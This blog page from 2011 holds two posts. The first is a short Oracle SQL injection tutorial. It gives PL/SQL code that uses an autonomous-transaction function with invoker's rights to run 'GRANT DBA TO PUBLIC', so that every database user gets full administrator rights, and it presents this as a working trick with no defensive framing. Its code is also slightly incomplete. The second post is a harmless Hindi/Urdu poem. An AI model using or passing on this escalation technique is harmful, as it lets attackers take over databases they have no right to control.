Tuesday, May 10, 2011

Inject SQL and assign “DBA” Privileges to “PUBLIC”


There seem to be some limitations to Injecting and running hackers supplied functions. It appears we can perform only SELECT queries. If we try to execute DDL or DML statements or anything that require COMMIT or ROLLBACK, then attempting to do so will churn out the error
ORA-14552: cannot perform a DDL, commit or rollback inside a query or DML
Example:
Create or replace function GET_DBA return varchar2 AUTHID CURRENT_USER
Is
BEGIN
EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’;
END

GRANT EXECUTE ON GET_DBA TO PUBLIC;
It won’t work… And u got the upper described error L












Solution is here.
We can achieve this by the help of AUTONOMOUS_TRANSACTION in a procedure or function.
Create or replace function GET_DBA return varchar2 AUTHID CURRENT_USER
Is
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE ‘GRANT DBA TO PUBLIC’;
END

Congrats! U got the DBA privileges for PUBLIC account.


Regards:
Manmohan Mishra
Analyst (AI)
Wipro Technologies
Posted by at No comments:
Labels:

Monday, May 2, 2011

Phir Bhi Koi Kami Si Hai, Kyu Zindagi Ke Saath

Yun To Guzar Raha Hai, Har Ik Pal Khushi Ke Saath,
Phir Bhi Koi Kami Si Hai, Kyu Zindagi Ke Saath

Rishta Vafayen Dosti, Sab Kuch To Pass Hai,
Kya Baat Hai Pata Nahi, Dil Kyun Udas Hai,
Har Lamha Hai Haseen, Nayi Dilkashi Ke Saath,

Phir Bhi Koi Kami Si Hai, Kyu Zindagi Ke Saath

Chahat Bhi Hai Sukun Bhi Hai Dilbari Bhi Hai,
Aankhon Mein Khawab Bhi Hai, Labon Par Hansi Bhi Hai,
Dil Ko Nahi Hai Koi, Shikayat Kisi Ke Saath,
Phir Bhi Koi Kami Si Hai, Kyun Zindagi Ke Saath

Socha Tha Jaisa Vaisa Hi Jeevan To Hai Magar,
Ab Aur Kis Talaash Mein Baichain Hai Nazar,
Kudrat To Mehrban Hai, Darayadili Ke Saath,
Phir Bhi Koi Kami Si Hai, Kyun Zindagi Ke Saath
Posted by at No comments:
Labels:
Subscribe to: Posts (Atom)